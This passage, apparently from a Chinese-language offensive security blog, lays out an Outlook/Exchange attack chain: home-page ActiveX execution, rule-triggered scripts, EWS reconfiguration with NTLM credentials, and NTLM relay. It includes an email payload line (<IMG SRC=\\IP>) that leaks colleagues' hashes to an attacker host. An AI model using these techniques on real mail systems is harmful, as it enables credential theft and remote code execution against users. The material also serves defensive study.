<div> 
只要打開OUTLOOK就會立即執行,最主要的是可以該主頁可以調用outlook的內部IE瀏覽器,Outlook的內部IE瀏覽器可以執ACTIVEX,從而執行可執行程序。最騷的是即使在outlook設置中禁用了ACTIVEX,也不影響內部IE瀏覽器的ACTIVEX。 如:a.html,創建一個wscript.shell,執行notepad。代碼詳情見 https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/

只要重新啓動OUTLOOK即可直接執行。

二、OUTLOOK的規則濫用(遠程喚起)

主頁濫用每次重啓OUTLOOK都會執行惡意腳本,這樣在某些特殊情況下可能會動靜太大。這裏利用outlook的規則制定,打開管理規則和通知,點擊新建規則

新建空白規則,點擊下一步

通過自己的需求,設置制定規則,如收到包含fuck爲主題的郵件就彈出計算器。

通過這樣就可以遠程喚醒惡意腳本了。

三、exchange ews

Exchange ews接口支持NTLM認證,從而進行收發件,配置郵箱等操作,當然也可以配置上文的主頁和規則,這樣我們只要拿到NTLM憑證就可以操控本地用戶的outlook的配置,從而執行惡意程序。

四、NTLM中繼

要想快速拿到NTLM憑證,最快的方式就是dump密碼和hash中繼。既然outlook存在低版本的內置ie瀏覽器這邊選hash中繼。

五、域內用戶相互信任機制

在域內內部組織成員互相發送郵件是能夠加載JS的,只要在郵件正文插入JS,如<IMG SRC=\\IP(NTLM中繼地址)>,這樣倒敘往上推就可以拿下任何人的當前權限了。 從步驟5,4,3,2/1就可以形成攻擊鏈了

相關文章